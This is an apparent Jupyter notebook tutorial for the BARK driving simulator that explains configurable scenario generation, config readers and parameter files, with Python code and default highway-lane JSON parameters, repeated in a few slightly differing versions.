"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two source sink configs specified: one for the left lane of the road corridor on a highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. The goal definition uses the config reader FixedGoalTypes, enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The range of this region is specified via the parameter LongitudinalRange. With BARK's runtime, we can have a look through the scenarios created with the default parameter config:
###Code
from IPython import display
from bark.runtime.viewer.matplotlib_viewer import MPViewer
from bark.runtime.runtime import Runtime
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters so that the controlled agent's goal is on the left lane. Additionally, we want to create denser traffic on the left lane to make the lane change scenario harder. We decrease the ranges for sampling distances and velocities and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [3, 6]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [3, 6]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3.5 Writing your own config reader to sample behavior types. There are a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/bark/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader, using a config reader for behavior model sampling as an example. The process can easily be applied to the other config reader types as well. The config reader shall randomly sample behavior types from a list of specified behavior types. We implement the interface of ConfigReaderBehaviorModels as follows:
###Code
from bark.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.core.models.behavior import *
from bark.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model " \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server and read out the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of the objects must be persisted to allow for serialization of the behavior models. This class definition must be found by ConfigurableScenarioGeneration. We put it into [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py), which contains the already existing ConfigReaderBehaviorModels. Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can finetune these parameters. First, let's specify the new config type and extract the defaults. To specify a config type, simply use the name given to the config reader class. We now have the following initial source sink config, and running the scenario generation gives us the default params. These can of course be customized as desired.
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=2,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]["ConfigBehaviorModels"], indent=4))
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3. Configurable Scenario Generation. In this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, and then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK Scenarios. A BARK scenario contains a list of agents with their initial states, behavior, execution and dynamic models as well as a goal definition for each agent. Further, it contains a map file in the OpenDrive format. To support behavior benchmarking, each scenario specifies which agent is considered the ‘controlled’ agent during the simulation. A BARK scenario does not explicitly specify how agents will behave over time, e.g. using predefined maneuvers or trajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class persists agents and the map file name separately. When multiple scenarios are based on the same map file, this avoids serializing the processed map information in every scenario. In contrast, agents are fully serialized via python pickling. For this, the C++ agent class and all its members, e.g. behavior models, support python serialization. Before a scenario is run, the benchmark runner calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario Generation. Based on the scenario definition, we define a Scenario Generation base class that is responsible for creating a list of scenarios and for saving, loading and retrieving scenario sets. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
###Output
_____no_output_____
###Markdown
This base class allows new scenario generations to be created easily while enabling easy integration into BARK's benchmarking and ML training platforms, which use these common interfaces. Let's have a look at what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario Generation. Although new scenario generations are supported via the common interface, we require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement. The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y Points. For each source sink pair, multiple config readers are responsible for creating the features within this source sink pair. Config readers exist for each relevant property of a scenario and are processed for a source sink pair in a specific order. Information from one config reader is passed on to the next readers. We distinguish between fundamental information to build a scenario, which must be returned by a config reader, and optional information, which may be passed and could be incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows: 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions, 2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in agent state list - Optional return: e.g. list of types of behavior models 3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in agent state list - Optional return: e.g. list of types of execution models 4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in agent state list - Optional return: e.g. list of types of dynamic models 5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: List of size agent state list with True or False indicating if agent is controlled in a benchmarking run or not - Optional return: normally nothing 6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: List of goal definitions one for each agent in agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. 
The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/modules/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py). 3.4 Understanding Parameter Files. Let's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from modules.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from modules.runtime.commons.parameters import ParameterServer
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
print(json.dumps(params.ConvertToDict(), indent=4))
###Output
Changing to bark root /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project
Writing parameters to /home/esterle/.cache/bazel/_bazel_esterle/d337abac8c371120c1b9affa1049fa7e/execroot/bark_project/bazel-out/k8-fastbuild/bin/docs/tutorials/run.runfiles/bark_project/default_params.json
------ Scenario Default Parameters ---------
{
"Scenario": {
"Generation": {
"ConfigurableScenarioGeneration": {
"MapFilename": "modules/runtime/tests/data/city_highway_straight.xodr",
"SinksSources": [
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
0
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 60.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "NoneControlled"
},
"AgentParams": {
"MaxHistoryLength": 50
}
},
{
"SourceSink": [
[
5111.626,
5006.8305
],
[
5110.789,
5193.1725
]
],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {
"Type": "UniformVehicleDistribution",
"LanePositions": [
1
],
"VehicleDistanceRange": [
10,
20
],
"OtherVehicleVelocityRange": [
20,
30
],
"SRange": [
0.1,
0.7
]
},
"ConfigBehaviorModels": {
"Type": "FixedBehaviorType",
"ModelType": "BehaviorIDMClassic",
"ModelParams": {
"BehaviorIDMClassic": {
"MaxVelocity": 30.0,
"MinimumSpacing": 2.0,
"DesiredTimeHeadway": 1.5,
"MaxAcceleration": 1.7000000476837158,
"AccelerationLowerBound": -5.0,
"AccelerationUpperBound": 8.0,
"DesiredVelocity": 15.0,
"ComfortableBrakingAcceleration": 1.6699999570846558,
"MinVelocity": 0.0,
"Exponent": 4
}
}
},
"ConfigExecutionModels": {
"Type": "FixedExecutionType",
"ModelType": "ExecutionModelInterpolate"
},
"ConfigDynamicModels": {
"Type": "FixedDynamicType",
"ModelType": "SingleTrackModel"
},
"ConfigGoalDefinitions": {
"Type": "FixedGoalTypes",
"GoalTypeControlled": "EndOfLane",
"GoalTypeOthers": "EndOfLane",
"MaxLateralDist": [
0.1,
0.1
],
"LongitudinalRange": [
0,
1.0
],
"MaxOrientationDifference": [
0.08,
0.08
],
"VelocityRange": [
10,
20
]
},
"ConfigControlledAgents": {
"Type": "RandomSingleAgent"
},
"AgentParams": {
"MaxHistoryLength": 50
}
}
],
"ConflictResolution": {
"left_lane/right_lane": [
0.2,
0.8
]
}
}
}
}
}
###Markdown
In the default configuration, we have two source sink configs specified: one for the left lane of the road corridor on a highway, one for the right lane. We use the config reader type UniformVehicleDistribution for ConfigAgentStatesGeometries. There, we can specify vehicle distance ranges and ranges of initial velocity. As behavior model config, we use FixedBehaviorType, where one type of behavior model with its parameters is specified. The goal definition uses the config reader FixedGoalTypes, enabling separate specification of goal definitions for controlled and non-controlled agents. It uses a FrenetGoalType with a geometric goal region around the centerline of the goal lane. The extent of this region is specified via the parameter LongitudinalRange. With BARK's runtime, we can have a look at the scenarios created with the default parameter config:
###Code
from IPython import display
from modules.runtime.viewer.matplotlib_viewer import MPViewer
from modules.runtime.runtime import Runtime
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
follow_agent_id=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
We see the controlled agent in red and its goal region on the right lane. We now tune the parameters such that the controlled agent's goal is on the left lane. Additionally, we want to create denser traffic on the left lane to make the lane change scenario harder. We decrease the ranges for sampling distances and velocities and recreate the scenarios:
###Code
params_src_sink_right = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]
params_src_sink_right["ConfigGoalDefinitions"]["GoalTypeControlled"] = "LaneChangeLeft"
params_src_sink_left = params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][0]
params_src_sink_left["ConfigAgentStatesGeometries"]["VehicleDistanceRange"] = [3, 6]
params_src_sink_left["ConfigAgentStatesGeometries"]["OtherVehicleVelocityRange"] = [3, 6]
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 5, params = params)
num_scenarios_to_show = 5
num_steps_per_scenario = 4
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3.5 Writing your own config reader to sample behavior types There are a number of config readers defined in [config_readers](https://github.com/bark-simulator/bark/tree/master/modules/runtime/scenario/scenario_generation/config_readers) and we plan to extend this set further in the future. In this section, we demonstrate how to write your own config reader by writing a config reader for behavior model sampling; the process can easily be applied to the other config reader types as well. The config reader shall randomly sample behavior types from a list of specified behavior types. We implement the interface of ConfigReaderBehaviorModels as follows
###Code
from modules.runtime.scenario.scenario_generation.config_readers.config_readers_interfaces import ConfigReaderBehaviorModels
from bark.models.behavior import *
from modules.runtime.commons.parameters import ParameterServer
class SampleBehaviorType(ConfigReaderBehaviorModels):
def __init__(self, random_state):
super().__init__(random_state)
self.param_servers = []
def create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs):
model_types = config_param_object["ModelTypesList", "Type of behavior model" \
"used for all vehicles", ["BehaviorIDMClassic", "BehaviorMobil"]]
model_params = config_param_object.AddChild("ModelParams")
# ----- DEFAULT PARAMETER HANDLING
# based on types retrieve default params which are maintained as scenario defaults
for model_type in model_types:
behavior_params = model_params.AddChild(model_type)
_, _ = self.model_from_model_type(model_type, behavior_params)
#param server must be persisted for each behavior to enable serialization of parameters
#------ BEHAVIOR MODEL SAMPLING
behavior_models = []
behavior_model_types = []
for _ in agent_states:
model_idx = self.random_state.randint(low=0, high=len(model_types), size=None)
model_type = model_types[model_idx]
model_type_params = model_params.AddChild(model_type)
params = ParameterServer()
bark_model, params = self.model_from_model_type(model_type, model_type_params)
self.param_servers.append(model_type_params)
behavior_models.append(bark_model)
behavior_model_types.append(model_type)
return behavior_models, {"behavior_model_types" : behavior_model_types}, config_param_object
def model_from_model_type(self, model_type, params):
bark_model = eval("{}(params)".format(model_type))
return bark_model, params
def get_param_servers(self):
return self.param_servers
###Output
_____no_output_____
###Markdown
The main functionality is covered in `create_from_config(self, config_param_object, road_corridor, agent_states, **kwargs)`. Here, we first read a list of behavior types from the parameter server (a parameter is accessed with its name, a description and a default value, which is used if the parameter has not been set yet) and retrieve the default parameters of these model types. Then, we use the global random seed state managed by the scenario generation to sample the behavior types. Note that the parameter servers of the created objects must be persisted to allow for serialization of the behavior models. This class definition must be findable by ConfigurableScenarioGeneration. We put it into [behavior_model_config_readers.py](https://github.com/bark-simulator/bark/blob/master/modules/runtime/scenario/scenario_generation/config_readers/behavior_model_config_readers.py), which contains the already existing ConfigReaderBehaviorModels. Now, we use this config to randomly sample Mobil and IDM models on the right highway lane. We first set the type of ConfigBehaviorModels to our new definition. By rerunning the scenario generation, all **default parameters are automatically extracted**. Afterwards, we can fine-tune these parameters. First, let's specify the new config type and extract the defaults. To specify a config type, simply use the name given to the config reader class. We now have the following initial source sink config, and running the scenario generation gives us the default params. These can of course be customized as desired.
###Code
sink_source_dict = [{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "left_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [0]},
"ConfigBehaviorModels": {"Type": "FixedBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "NoneControlled"},
"AgentParams" : {}
},
{
"SourceSink": [[5111.626, 5006.8305], [5110.789, 5193.1725] ],
"Description": "right_lane",
"ConfigAgentStatesGeometries": {"Type": "UniformVehicleDistribution", "LanePositions": [1]},
"ConfigBehaviorModels": {"Type": "SampleBehaviorType"},
"ConfigExecutionModels": {"Type": "FixedExecutionType"},
"ConfigDynamicModels": {"Type": "FixedDynamicType"},
"ConfigGoalDefinitions": {"Type": "FixedGoalTypes"},
"ConfigControlledAgents": {"Type": "RandomSingleAgent"},
"AgentParams" : {}
}]
params = ParameterServer()
params["World"]["remove_agents_out_of_map"] = True
params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"] = sink_source_dict
scenario_generation = ConfigurableScenarioGeneration(num_scenarios=2,params=params)
print("\n\n ------ ConfigBehaviorModels Default Parameters ---------")
print(json.dumps(params["Scenario"]["Generation"]["ConfigurableScenarioGeneration"]["SinksSources"][1]["ConfigBehaviorModels"], indent=4))
plt.figure(figsize=(10, 10))
viewer = MPViewer(
params=params,
y_length = 80,
enforce_y_length=True,
enforce_x_length=False,
use_world_bounds=True,
axis=plt.gca())
num_scenarios_to_show = 5
num_steps_per_scenario = 20
step_time = 0.2
for _ in range(0, num_scenarios_to_show):
scenario, idx = scenario_generation.get_next_scenario()
world = scenario.GetWorldState()
for _ in range(0, num_steps_per_scenario):
viewer.drawWorld(world, eval_agent_ids=scenario._eval_agent_ids, scenario_idx=idx )
display.clear_output(wait=True)
display.display(viewer.axes.get_figure())
world.Step(step_time)
viewer.clear()
###Output
_____no_output_____
###Markdown
3. Configurable Scenario Generation In this notebook, we demonstrate the capabilities of the configurable scenario generation of BARK. First, we clarify what a BARK scenario is, to then describe how the configurable scenario generation allows flexible, extensible creation of a variety of scenario types. 3.1 BARK Scenarios A BARK scenario contains a list of agents with their initial states, behavior, execution and dynamic models as well as a goal definition for each agent. Further, it contains a map file in the OpenDrive format. To support behavior benchmarking, each scenario specifies which agent is considered as the ‘controlled’ agent during the simulation. A BARK scenario does not explicitly specify how agents will behave over time, e.g. using predefined maneuvers or trajectories. A BARK scenario thus uses the following implementation:
###Code
class Scenario:
def __init__(self,
agent_list=None,
eval_agent_ids=None,
map_file_name=None,
json_params=None,
map_interface=None):
self._agent_list = agent_list or []
self._eval_agent_ids = eval_agent_ids or []
self._map_file_name = map_file_name
self._json_params = json_params
self._map_interface = map_interface
###Output
_____no_output_____
###Markdown
The scenario class separately persists the agents and the map file name. When multiple scenarios are based on the same map file, this avoids serialization of the processed map information in all the scenarios. In contrast, agents are fully serialized via Python pickling. For this, the C++ agent class and all its members, e.g. behavior models, support Python serialization. Before starting to run a scenario, the benchmark runner calls `_build_world_state` to create the world state used in a simulation run:
###Code
def _build_world_state(self):
param_server = ParameterServer(json=self._json_params)
world = World(param_server)
if self._map_interface is None:
world = self.SetupMap(world, self._map_file_name)
else:
world.SetMap(self._map_interface)
for agent in self._agent_list:
agent.GenerateRoadCorridor(self._map_interface)
world.AddAgent(agent)
return world
###Output
_____no_output_____
###Markdown
3.2 BARK Scenario Generation Based on the scenario definition, we define a ScenarioGeneration base class responsible for creating a list of scenarios and for managing saving and loading of scenario sets as well as retrieving individual scenarios. The simplified structure of BARK's base scenario generation is:
###Code
class ScenarioGeneration:
def __init__(self, params=None, num_scenarios=None, random_seed=1000):
self._params = params
self._current_scenario_idx = 0
self._random_seed = random_seed
self._scenario_list = self.create_scenarios(params, num_scenarios)
def get_scenario(self, idx):
return self._scenario_list[idx].copy()
def dump_scenario_list(self, filename):
with open(filename, "wb") as file:
# print("SAVE PATH:", os.path.abspath(filename))
pickle.dump(self._scenario_list, file)
def load_scenario_list(self, filename):
with open(filename, "rb") as file:
self._scenario_list = pickle.load(file)
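# Note: this simplified listing omits the `import pickle` it relies on and assumes that a
# subclass implements create_scenarios(). A hedged usage sketch of the common interface
# (the file name is chosen arbitrarily for illustration):
#   generation = ConfigurableScenarioGeneration(num_scenarios=5, params=ParameterServer())
#   generation.dump_scenario_list("my_scenarios.pickle")
#   generation.load_scenario_list("my_scenarios.pickle")
#   first_scenario = generation.get_scenario(0)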
###Output
_____no_output_____
###Markdown
This base class makes it easy to create new scenario generations while enabling easy integration into BARK's benchmarking and ML training platforms, which use these common interfaces. Let's have a look at what the configurable scenario generation provides. 3.3 Concept of Configurable Scenario Generation Though new scenario generations are supported via the common interface, we also require a modularized perspective on the set of features characterizing a scenario. For instance, we want to configure initial states of agents independently of behavior models or goal configurations. To achieve this, we must ensure that configuration options for one set of features can easily be combined with other sets of features. The configurable scenario generation implements this requirement. The fundamental building blocks of a scenario in the configurable scenario generation are source sink pairs. A source sink pair defines a road corridor in the map. It is specified with either a pair of OpenDrive Road Ids or a pair of X/Y points. For each source sink pair, multiple config readers are responsible for creating the features within this source sink pair. Config readers exist for each relevant property of a scenario and are processed for a source sink pair in a specific order. Information from one config reader is passed on to the next readers. We distinguish between fundamental information needed to build a scenario, which must be returned by a config reader, and optional information, which may be passed and incorporated by subsequent readers. The information flow to create the agents in a **single** source sink config is as follows: 1. ConfigReaderAgentStatesAndGeometries: - Retrieves: Road corridor of this source sink - Must return: list of agent states and a list of agent shapes - Optional return: e.g. list of agent ids, lane positions 2. ConfigBehaviorModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of behavior models for each agent in the agent state list - Optional return: e.g. list of types of behavior models 3. ConfigExecutionModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of execution models for each agent in the agent state list - Optional return: e.g. list of types of execution models 4. ConfigDynamicModels: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: list of dynamic models for each agent in the agent state list - Optional return: e.g. list of types of dynamic models 5. ConfigControlledAgents: - Retrieves: Road corridor of this source sink, agent state list, collected optional returns - Must return: a list of the same size as the agent state list with True or False indicating whether an agent is controlled in a benchmarking run - Optional return: normally nothing 6. ConfigGoalDefinitions: - Retrieves: Road corridor of this source sink, agent state list, list of controlled_agent_ids, collected optional returns - Must return: list of goal definitions, one for each agent in the agent state list - Optional return: normally nothing Returns are collected and finally the agents for the source sink config are created. Then, the chain is run for the next source sink config. 
The interfaces of all config reader types are implemented in [config_readers_interfaces.py](https://github.com/bark-simulator/bark/blob/master/bark/runtime/scenario/scenario_generation/config_readers/config_readers_interfaces.py) 3.4 Understanding Parameter Files Let's have a look at the default parameter file of the configurable scenario generation to better understand this concept:
###Code
import config_notebook
import json
from bark.runtime.scenario.scenario_generation.configurable_scenario_generation import ConfigurableScenarioGeneration
from bark.runtime.commons.parameters import ParameterServer
import os
params = ParameterServer()
scenario_generation = ConfigurableScenarioGeneration(num_scenarios = 20, params = params)
params.Save("default_params.json")
print("\n\n ------ Scenario Default Parameters ---------")
